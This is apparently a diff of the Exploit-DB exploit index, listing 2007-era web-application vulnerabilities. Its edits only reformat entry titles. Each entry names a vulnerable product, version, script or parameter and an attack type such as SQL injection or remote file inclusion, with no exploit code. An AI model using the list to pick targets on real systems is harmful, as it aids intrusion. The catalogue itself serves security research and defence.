Exploit",2007-06-18,BlackHawk,php,webapps,0 -4079,platforms/php/webapps/4079.txt,"MiniBill 1.2.5 - (run_billing.php) Remote File Inclusion",2007-06-18,Abo0od,php,webapps,0 +4079,platforms/php/webapps/4079.txt,"MiniBill 1.2.5 - 'run_billing.php' Remote File Inclusion",2007-06-18,Abo0od,php,webapps,0 4081,platforms/php/webapps/4081.php,"Jasmine CMS 1.0 - SQL Injection / Remote Code Execution",2007-06-19,Silentz,php,webapps,0 -4082,platforms/php/webapps/4082.pl,"LiveCMS 3.4 - (categoria.php cid) SQL Injection",2007-06-20,g00ns,php,webapps,0 +4082,platforms/php/webapps/4082.pl,"LiveCMS 3.4 - 'categoria.php cid' SQL Injection",2007-06-20,g00ns,php,webapps,0 4083,platforms/asp/webapps/4083.txt,"W1L3D4 WEBmarket 0.1 - SQL Injection",2007-06-20,Crackers_Child,asp,webapps,0 4084,platforms/php/webapps/4084.txt,"XOOPS Module wiwimod 0.4 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps,0 4085,platforms/php/webapps/4085.txt,"Musoo 0.21 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps,0 4086,platforms/php/webapps/4086.pl,"LAN Management System (LMS) 1.9.6 - Remote File Inclusion",2007-06-20,Kw3[R]Ln,php,webapps,0 -4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion",2007-06-21,Kw3[R]Ln,php,webapps,0 -4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0 +4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - 'load_lang.php' Remote File Inclusion",2007-06-21,Kw3[R]Ln,php,webapps,0 +4090,platforms/php/webapps/4090.pl,"Powl 0.94 - 'htmledit.php' Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0 4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0 4092,platforms/php/webapps/4092.txt,"NetClassifieds - SQL Injection / Cross-Site Scripting / Full Path",2007-06-22,"laurent gaffié",php,webapps,0 -4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - (index.php ID) SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 +4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - 'index.php ID' SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution",2007-06-24,DarkFig,php,webapps,0 4097,platforms/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0 4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 - 'index.php submit' SQL Injection",2007-06-24,Kacper,php,webapps,0 4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0 4100,platforms/php/webapps/4100.txt,"phpTrafficA 1.4.2 - (pageid) SQL Injection",2007-06-24,"laurent gaffié",php,webapps,0 -4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 - (footer.inc.php tfooter) Remote File Inclusion",2007-06-25,Rf7awy,php,webapps,0 +4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 - 'footer.inc.php tfooter' Remote File Inclusion",2007-06-25,Rf7awy,php,webapps,0 4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting",2007-06-25,t0pP8uZz,php,webapps,0 4104,platforms/php/webapps/4104.txt,"6ALBlog - 'newsid' SQL Injection",2007-06-25,Crackers_Child,php,webapps,0 -4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 - (ShowImage.php name) File Disclosure",2007-06-25,"H4 / XPK",php,webapps,0 -4106,platforms/php/webapps/4106.php,"DreamLog 0.5 - (upload.php) Arbitrary File Upload",2007-06-25,Dj7xpl,php,webapps,0 +4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 - 'ShowImage.php name' File Disclosure",2007-06-25,"H4 / XPK",php,webapps,0 +4106,platforms/php/webapps/4106.php,"DreamLog 0.5 - 'upload.php' Arbitrary File Upload",2007-06-25,Dj7xpl,php,webapps,0 4107,platforms/php/webapps/4107.txt,"Pagetool 1.07 - (news_id) SQL Injection",2007-06-25,Katatafish,php,webapps,0 4108,platforms/php/webapps/4108.txt,"eDocStore - 'doc.php doc_id' SQL Injection",2007-06-25,t0pP8uZz,php,webapps,0 -4111,platforms/php/webapps/4111.txt,"PHPSiteBackup 0.1 - (pcltar.lib.php) Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0 -4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0 +4111,platforms/php/webapps/4111.txt,"PHPSiteBackup 0.1 - 'pcltar.lib.php' Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0 +4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 <= 2.2 - 'index.php3' Remote File Inclusion",2007-06-26,g00ns,php,webapps,0 4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - 'wp-app.php' Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0 4114,platforms/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0 4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Parameter Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 - SQL Injection / Cross-Site Scripting",2007-06-28,GoLd_M,php,webapps,0 4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum 6.4.4 - Local File Inclusion",2007-06-28,Katatafish,php,webapps,0 -4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - (login.php rid) SQL Injection",2007-06-28,r00t,php,webapps,0 -4127,platforms/php/webapps/4127.txt,"Buddy Zone 1.5 - (view_sub_cat.php cat_id) SQL Injection",2007-06-29,t0pP8uZz,php,webapps,0 +4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - 'login.php rid' SQL Injection",2007-06-28,r00t,php,webapps,0 +4127,platforms/php/webapps/4127.txt,"Buddy Zone 1.5 - 'view_sub_cat.php cat_id' SQL Injection",2007-06-29,t0pP8uZz,php,webapps,0 4128,platforms/php/webapps/4128.txt,"Buddy Zone 1.5 - Multiple SQL Injections",2007-06-30,t0pP8uZz,php,webapps,0 4129,platforms/php/webapps/4129.txt,"Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion",2007-06-30,BlackNDoor,php,webapps,0 -4130,platforms/php/webapps/4130.txt,"TotalCalendar 2.402 - (view_event.php) SQL Injection",2007-06-30,t0pP8uZz,php,webapps,0 -4131,platforms/php/webapps/4131.txt,"XCMS 1.1 - (Galerie.php) Local File Inclusion",2007-06-30,BlackNDoor,php,webapps,0 +4130,platforms/php/webapps/4130.txt,"TotalCalendar 2.402 - 'view_event.php' SQL Injection",2007-06-30,t0pP8uZz,php,webapps,0 +4131,platforms/php/webapps/4131.txt,"XCMS 1.1 - 'Galerie.php' Local File Inclusion",2007-06-30,BlackNDoor,php,webapps,0 4132,platforms/php/webapps/4132.txt,"sPHPell 1.01 - Multiple Remote File Inclusion",2007-06-30,"Mehmet Ince",php,webapps,0 4133,platforms/php/webapps/4133.txt,"ArcadeBuilder Game Portal Manager 1.7 - SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 4134,platforms/php/webapps/4134.txt,"Easybe 1-2-3 Music Store - 'process.php' SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 -4135,platforms/php/webapps/4135.pl,"phpEventCalendar 0.2.3 - (eventdisplay.php) SQL Injection",2007-07-01,Iron,php,webapps,0 +4135,platforms/php/webapps/4135.pl,"phpEventCalendar 0.2.3 - 'eventdisplay.php' SQL Injection",2007-07-01,Iron,php,webapps,0 4136,platforms/php/webapps/4136.txt,"YouTube Clone Script - 'msg.php id' SQL Injection",2007-07-02,t0pP8uZz,php,webapps,0 -4138,platforms/php/webapps/4138.txt,"AV Arcade 2.1b - (index.php id) SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 -4139,platforms/php/webapps/4139.txt,"PHPDirector 0.21 - (videos.php id) SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 -4140,platforms/php/webapps/4140.txt,"vbzoom 1.x - (forum.php MainID) SQL Injection",2007-07-02,"Cold Zero",php,webapps,0 +4138,platforms/php/webapps/4138.txt,"AV Arcade 2.1b - 'index.php id' SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 +4139,platforms/php/webapps/4139.txt,"PHPDirector 0.21 - 'videos.php id' SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 +4140,platforms/php/webapps/4140.txt,"vbzoom 1.x - 'forum.php MainID' SQL Injection",2007-07-02,"Cold Zero",php,webapps,0 4141,platforms/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection",2007-07-03,t0pP8uZz,php,webapps,0 -4142,platforms/php/webapps/4142.txt,"Girlserv ads 1.5 - (details_news.php) SQL Injection",2007-07-03,"Cold Zero",php,webapps,0 +4142,platforms/php/webapps/4142.txt,"Girlserv ads 1.5 - 'details_news.php' SQL Injection",2007-07-03,"Cold Zero",php,webapps,0 4144,platforms/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution (2)",2007-07-03,BlackHawk,php,webapps,0 4145,platforms/php/webapps/4145.php,"MyCMS 0.9.8 - Remote Command Execution (1)",2007-07-03,BlackHawk,php,webapps,0 4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - 'viewforum.php' SQL Injection",2007-07-03,Coloss,php,webapps,0 4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,php,webapps,0 -4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - (callboth.php) Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps,0 +4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - 'callboth.php' Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps,0 4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - 'categories_type.php' SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4156,platforms/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0 @@ -17833,12 +17836,12 @@ id,file,description,date,author,platform,type,port 4161,platforms/php/webapps/4161.txt,"FlashGameScript 1.7 - (user) SQL Injection",2007-07-08,Xenduer77,php,webapps,0 4163,platforms/php/webapps/4163.php,"AV Tutorial Script 1.0 - Remote User Pass Change Exploit",2007-07-08,Dj7xpl,php,webapps,0 4164,platforms/php/webapps/4164.txt,"Aigaion 1.3.3 - (topic topic_id) SQL Injection",2007-07-09,CypherXero,php,webapps,0 -4166,platforms/php/webapps/4166.txt,"vBulletin Mod RPG Inferno 2.4 - (inferno.php) SQL Injection",2007-07-10,t0pP8uZz,php,webapps,0 -4167,platforms/php/webapps/4167.txt,"OpenLD 1.2.2 - (index.php id) SQL Injection",2007-07-10,CypherXero,php,webapps,0 -4169,platforms/php/webapps/4169.txt,"FlashBB 1.1.8 - (sendmsg.php) Remote File Inclusion",2007-07-10,Kw3[R]Ln,php,webapps,0 +4166,platforms/php/webapps/4166.txt,"vBulletin Mod RPG Inferno 2.4 - 'inferno.php' SQL Injection",2007-07-10,t0pP8uZz,php,webapps,0 +4167,platforms/php/webapps/4167.txt,"OpenLD 1.2.2 - 'index.php id' SQL Injection",2007-07-10,CypherXero,php,webapps,0 +4169,platforms/php/webapps/4169.txt,"FlashBB 1.1.8 - 'sendmsg.php' Remote File Inclusion",2007-07-10,Kw3[R]Ln,php,webapps,0 4171,platforms/php/webapps/4171.pl,"Mail Machine 3.989 - Local File Inclusion",2007-07-10,"H4 / XPK",php,webapps,0 4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution",2007-07-11,jmp-esp,php,webapps,0 -4174,platforms/php/webapps/4174.txt,"PsNews 1.1 - (show.php newspath) Local File Inclusion",2007-07-12,irk4z,php,webapps,0 +4174,platforms/php/webapps/4174.txt,"PsNews 1.1 - 'show.php newspath' Local File Inclusion",2007-07-12,irk4z,php,webapps,0 4179,platforms/php/webapps/4179.php,"MKPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps,0 4180,platforms/php/webapps/4180.txt,"MKPortal NoBoard Module (Beta) - Remote File Inclusion",2007-07-14,g00ns,php,webapps,0 4182,platforms/php/webapps/4182.txt,"CMScout 1.23 - 'index.php' SQL Injection",2007-07-14,g00ns,php,webapps,0 @@ -17850,20 +17853,20 @@ id,file,description,date,author,platform,type,port 4189,platforms/php/webapps/4189.txt,"Expert Advisior - 'index.php id' SQL Injection",2007-07-17,t0pP8uZz,php,webapps,0 4191,platforms/php/webapps/4191.txt,"Pictures Rating - 'index.php msgid' SQL Injection",2007-07-18,t0pP8uZz,php,webapps,0 4192,platforms/php/webapps/4192.htm,"Vivvo CMS 3.4 - 'index.php' Blind SQL Injection",2007-07-18,ajann,php,webapps,0 -4193,platforms/php/webapps/4193.txt,"QuickEStore 8.2 - (insertorder.cfm) SQL Injection",2007-07-18,meoconx,php,webapps,0 +4193,platforms/php/webapps/4193.txt,"QuickEStore 8.2 - 'insertorder.cfm' SQL Injection",2007-07-18,meoconx,php,webapps,0 4194,platforms/php/webapps/4194.txt,"Joomla! Component Expose RC35 - Arbitrary File Upload",2007-07-18,"Cold Zero",php,webapps,0 4195,platforms/php/webapps/4195.txt,"BBS E-Market - 'postscript.php p_mode' Remote File Inclusion",2007-07-18,mozi,php,webapps,0 -4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - (link_main.php) Remote File Inclusion",2007-07-18,bd0rk,php,webapps,0 +4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - 'link_main.php' Remote File Inclusion",2007-07-18,bd0rk,php,webapps,0 4198,platforms/asp/webapps/4198.txt,"A-shop 0.70 - Remote File Deletion",2007-07-18,Timq,asp,webapps,0 4199,platforms/php/webapps/4199.txt,"Md-Pro 1.0.8x - (Topics topicid) SQL Injection",2007-07-18,anonymous,php,webapps,0 4201,platforms/php/webapps/4201.txt,"Joomla! Component Pony Gallery 1.5 - SQL Injection",2007-07-19,ajann,php,webapps,0 -4206,platforms/php/webapps/4206.txt,"Blog System 1.x - (index.php news_id) SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0 +4206,platforms/php/webapps/4206.txt,"Blog System 1.x - 'index.php news_id' SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0 4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - 'catid' Parameter SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0 4210,platforms/php/webapps/4210.txt,"RGameScript Pro - 'page.php id' Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0 4211,platforms/php/webapps/4211.htm,"JBlog 1.0 - Create / Delete Admin Authentication Bypass",2007-07-21,s4mi,php,webapps,0 4212,platforms/php/webapps/4212.txt,"Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 4213,platforms/php/webapps/4213.txt,"bwired - 'index.php newsID' SQL Injection",2007-07-22,g00ns,php,webapps,0 -4219,platforms/php/webapps/4219.txt,"Confixx Pro 3.3.1 - (saveserver.php) Remote File Inclusion",2007-07-24,"H4 / XPK",php,webapps,0 +4219,platforms/php/webapps/4219.txt,"Confixx Pro 3.3.1 - 'saveserver.php' Remote File Inclusion",2007-07-24,"H4 / XPK",php,webapps,0 4220,platforms/php/webapps/4220.pl,"Entertainment CMS - (Local Inclusion) Remote Command Execution",2007-07-24,Kw3[R]Ln,php,webapps,0 4221,platforms/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,php,webapps,0 4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple SQL Injections",2007-07-25,bypass,php,webapps,0 @@ -17871,32 +17874,32 @@ id,file,description,date,author,platform,type,port 40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 4235,platforms/php/webapps/4235.txt,"Seditio CMS 121 - 'pfs.php' Arbitrary File Upload",2007-07-27,A.D.T,php,webapps,0 4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0 -4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - (comments_get.asp id) SQL Injection",2007-07-28,g00ns,asp,webapps,0 +4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - 'comments_get.asp id' SQL Injection",2007-07-28,g00ns,asp,webapps,0 4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php cat' SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0 4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection",2007-07-29,EgiX,php,webapps,0 4246,platforms/php/webapps/4246.txt,"wolioCMS - Authentication Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0 4248,platforms/php/webapps/4248.txt,"Joomla! Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 -4253,platforms/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - (main.php cid) SQL Injection",2007-08-02,uimp,php,webapps,0 +4253,platforms/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - 'main.php cid' SQL Injection",2007-08-02,uimp,php,webapps,0 4254,platforms/php/webapps/4254.txt,"AuraCMS Forum Module - SQL Injection",2007-08-05,k1tk4t,php,webapps,0 4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - (topic) SQL Injection",2007-08-05,k1tk4t,php,webapps,0 4258,platforms/php/webapps/4258.txt,"Lanius CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,php,webapps,0 -4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 +4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 4264,platforms/cgi/webapps/4264.txt,"Cartweaver 2.16.11 - 'ProdID' Parameter SQL Injection",2007-08-06,meoconx,cgi,webapps,0 4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4269,platforms/php/webapps/4269.txt,"FrontAccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 -4271,platforms/php/webapps/4271.txt,"FishCart 3.2 RC2 - (fc_example.php) Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 -4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 - (archive.php) Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps,0 +4271,platforms/php/webapps/4271.txt,"FishCart 3.2 RC2 - 'fc_example.php' Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 +4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 - 'archive.php' Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps,0 4275,platforms/php/webapps/4275.php,"PHP Blue Dragon CMS 3.0.0 - SQL Injection",2007-08-10,Kacper,php,webapps,0 4276,platforms/php/webapps/4276.txt,"PHP blue dragon CMS 3.0.0 - Remote File Inclusion",2007-08-10,Kacper,php,webapps,0 4277,platforms/php/webapps/4277.php,"PHP Blue Dragon CMS 3.0.0 - Remote Code Execution",2007-08-10,Kacper,php,webapps,0 -4278,platforms/php/webapps/4278.txt,"Pixlie 1.7 - (pixlie.php root) Remote File Disclosure",2007-08-10,Rizgar,php,webapps,0 +4278,platforms/php/webapps/4278.txt,"Pixlie 1.7 - 'pixlie.php root' Remote File Disclosure",2007-08-10,Rizgar,php,webapps,0 4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - (file) Remote File Disclosure",2007-08-13,dun,php,webapps,0 4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php cat' SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Login Bypass (SQL Injection)",2007-08-14,s4squatch,cgi,webapps,0 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0 -4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 +4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) SQL Injection",2007-08-21,k1tk4t,php,webapps,0 4305,platforms/php/webapps/4305.txt,"Joomla! Component NeoRecruit 1.4 - 'id' SQL Injection",2007-08-23,ajann,php,webapps,0 @@ -17907,40 +17910,40 @@ id,file,description,date,author,platform,type,port 4310,platforms/php/webapps/4310.txt,"Joomla! Component BibTeX 1.3 - Blind SQL Injection",2007-08-23,ajann,php,webapps,0 4313,platforms/php/webapps/4313.pl,"SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 -4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 +4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - 'include.php skindir' Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 - SQL Injection / Remote File Inclusion",2007-08-27,SmOk3,php,webapps,0 4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - (show) SQL Injection",2007-08-27,D4m14n,php,webapps,0 -4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 - (revert-content.php) SQL Injection",2007-08-28,"not sec group",php,webapps,0 +4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 - 'revert-content.php' SQL Injection",2007-08-28,"not sec group",php,webapps,0 4330,platforms/php/webapps/4330.txt,"ACG News 1.0 - (aid/catid) SQL Injection",2007-08-28,SmOk3,php,webapps,0 -4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 - (viewitem.php ItemID) Blind SQL Injection",2007-08-28,irvian,php,webapps,0 -4332,platforms/php/webapps/4332.txt,"VWar 1.5.0 R15 - (mvcw.php) Remote File Inclusion",2007-08-28,DNX,php,webapps,0 +4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 - 'viewitem.php ItemID' Blind SQL Injection",2007-08-28,irvian,php,webapps,0 +4332,platforms/php/webapps/4332.txt,"VWar 1.5.0 R15 - 'mvcw.php' Remote File Inclusion",2007-08-28,DNX,php,webapps,0 4333,platforms/php/webapps/4333.txt,"PHPNuke-Clan 4.2.0 - 'mvcw_conver.php' Remote File Inclusion",2007-08-28,DNX,php,webapps,0 -4336,platforms/php/webapps/4336.txt,"xGB 2.0 - (xGB.php) Remote Security Bypass",2007-08-29,DarkFuneral,php,webapps,0 +4336,platforms/php/webapps/4336.txt,"xGB 2.0 - 'xGB.php' Remote Security Bypass",2007-08-29,DarkFuneral,php,webapps,0 4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 - 'cat_id' Blind SQL Injection",2007-08-29,k1tk4t,php,webapps,0 -4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 - (shownews.php id) SQL Injection",2007-08-29,SmOk3,php,webapps,0 +4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 - 'shownews.php id' SQL Injection",2007-08-29,SmOk3,php,webapps,0 4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 - (rootdir) Remote File Inclusion",2007-08-29,GoLd_M,php,webapps,0 4341,platforms/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Arbitrary File Upload / Local File Inclusion",2007-08-29,GoLd_M,php,webapps,0 4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",php,webapps,0 -4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Arbitrary File Upload",2007-08-30,Don,cgi,webapps,0 +4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - 'uploadmedia.cgi' Arbitrary File Upload",2007-08-30,Don,cgi,webapps,0 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,php,webapps,0 4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion",2007-09-02,bius,php,webapps,0 -4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) SQL Injection",2007-09-02,k1tk4t,php,webapps,0 +4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - 'error_view.php ID' SQL Injection",2007-09-02,k1tk4t,php,webapps,0 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0 4358,platforms/php/webapps/4358.txt,"STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0 -4363,platforms/php/webapps/4363.txt,"PHPOF 20040226 - (DB_adodb.class.php) Remote File Inclusion",2007-09-04,"ThE TiGeR",php,webapps,0 -4365,platforms/php/webapps/4365.txt,"AnyInventory 2.0 - (Environment.php) Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 +4363,platforms/php/webapps/4363.txt,"PHPOF 20040226 - 'DB_adodb.class.php' Remote File Inclusion",2007-09-04,"ThE TiGeR",php,webapps,0 +4365,platforms/php/webapps/4365.txt,"AnyInventory 2.0 - 'Environment.php' Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 4368,platforms/php/webapps/4368.txt,"PHPMytourney - 'menu.php' Remote File Inclusion",2007-09-06,S.W.A.T.,php,webapps,0 -4370,platforms/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE - (start.php) SQL Injection",2007-09-07,k1tk4t,php,webapps,0 -4371,platforms/php/webapps/4371.txt,"RW::Download 2.0.3 lite - (index.php dlid) SQL Injection",2007-09-07,k1tk4t,php,webapps,0 +4370,platforms/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE - 'start.php' SQL Injection",2007-09-07,k1tk4t,php,webapps,0 +4371,platforms/php/webapps/4371.txt,"RW::Download 2.0.3 lite - 'index.php dlid' SQL Injection",2007-09-07,k1tk4t,php,webapps,0 4374,platforms/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,php,webapps,0 4376,platforms/php/webapps/4376.txt,"TLM CMS 3.2 - Multiple SQL Injections",2007-09-08,k1tk4t,php,webapps,0 4377,platforms/php/webapps/4377.txt,"Focus/SIS 1.0/2.2 - Remote File Inclusion",2007-09-08,"ThE TiGeR",php,webapps,0 4378,platforms/php/webapps/4378.htm,"Fuzzylime CMS 3.0 - Local File Inclusion",2007-09-08,"not sec group",php,webapps,0 -4380,platforms/php/webapps/4380.txt,"Sisfo Kampus 2006 - (blanko.preview.php) Local File Disclosure",2007-09-08,QTRinux,php,webapps,0 +4380,platforms/php/webapps/4380.txt,"Sisfo Kampus 2006 - 'blanko.preview.php' Local File Disclosure",2007-09-08,QTRinux,php,webapps,0 4381,platforms/php/webapps/4381.txt,"Txx CMS 0.2 - Multiple Remote File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 -4382,platforms/php/webapps/4382.txt,"PHPress 0.2.0 - (adisplay.php lang) Local File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 +4382,platforms/php/webapps/4382.txt,"PHPress 0.2.0 - 'adisplay.php lang' Local File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 4383,platforms/php/webapps/4383.txt,"Joomla! Component Restaurante - Arbitrary File Upload",2007-09-08,"Cold Zero",php,webapps,0 